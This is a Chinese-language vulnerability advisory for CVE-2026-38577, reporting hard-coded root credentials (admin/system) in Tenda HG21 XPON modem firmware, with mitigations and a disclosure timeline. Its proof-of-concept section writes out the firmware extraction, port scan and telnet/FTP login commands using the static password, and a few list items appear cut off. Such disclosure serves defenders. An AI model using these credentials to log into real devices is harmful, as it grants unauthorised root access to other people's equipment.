概念验证,演示腾达 HG21 XPON 调制解调器固件中硬编码的 root 凭据(admin/system),可通过 telnet 和 FTP 实现未经授权的 root 访问。
| 字段 | 值 |
|---|---|
| CVE ID | CVE-2026-38577 |
| 厂商 | Tenda |
| 产品 | Tenda HG21 (XPON 光纤调制解调器) |
| 受影响版本 | V4.0.0-260302 |
| 产品密钥 | HG21-V1.0-TDE01 |
| 硬件版本 | V1.0 |
| 固件构建日期 | 2026-03-02 |
| 固件文件 | US_HG21re_300002982_en_xpon_2.zip |
| 漏洞类别 | CWE-798:使用硬编码凭据 |
| 发现者 | Anmol Singh Rajput — 独立安全研究员 |
| 披露状态 | 在 CVE 预留时尚未通知厂商 — 自 CVE 分配之日起适用 90 天负责任披露时限 |
对 Tenda HG21 XPON 光纤调制解调器的固件分析发现,出厂固件镜像中内置了一个硬编码的管理员账户。该账户被授予完整的 root 权限(UID 0),且其凭据在所有设备上均为静态值,这意味着任何能够访问受影响设备上暴露的管理服务的攻击者,都可以在无需知道用户自行设置的 Web 界面密码的情况下,以 root 身份进行认证。
/etc/passwd 包含一个 admin 条目,其 SHA256crypt 密码哈希对应静态值 system。0 — 即它就是 root,而非受限的服务账户。/etc/shadow,因此 passwd 中弱/静态的哈希是保护该账户的唯一屏障。/etc/inetd.conf 启动了 telnetd 和 ftpd,两者均以 root 身份运行,因此该硬编码账户可通过网络访问,而不仅限于串口/UART 控制台。能够通过网络访问受影响设备 telnet(TCP/23)或 FTP(TCP/21)服务的攻击者,可以使用静态密码以 admin 身份登录,并获得 root shell / root 级文件访问权限。这至少允许:
原始提交中的 CVSS 向量(厂商发布后评分可能有所不同):
这是一个基于凭据的 PoC — 它演示了硬编码账户能够通过认证并获得 root 权限,而非内存破坏类漏洞利用。仅可针对您拥有或明确获授权测试的设备运行。
# 提取固件(使用 binwalk 或您选择的厂商工具)
binwalk -e US_HG21re_300002982_en_xpon_2.bin
# 定位并检查 passwd 文件
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-hash-of-"system">:0:0:root:/root:/bin/sh
nmap -p 21,23 <target-ip>
telnet <target-ip>
# login: admin
# password: system
ftp <target-ip>
# Name: admin
# Password: system
在任一服务上成功登录后,将返回具有 root 权限的 shell/FTP 会话(id 将显示 uid=0(root))。
admin/system 账户,或至少在首次启动时强制设置唯一的、每设备随机的密码(不能仅由序列号推导得出)。telnetd/ftpd;要求远程管理必须显式启用,并通过经过认证的加密通道(SSH/SFTP)进行。| 日期 | 事件 |
|---|---|
| 2026-03-02 | 发布存在漏洞的固件版本 |
| — | 在独立固件分析期间发现 |
| 2026-04-09 | 通过 MITRE 预留 CVE-2026-38577 |
| — | 厂商通知待定(自 CVE 分配起 90 天披露窗口) |
发现并报告者: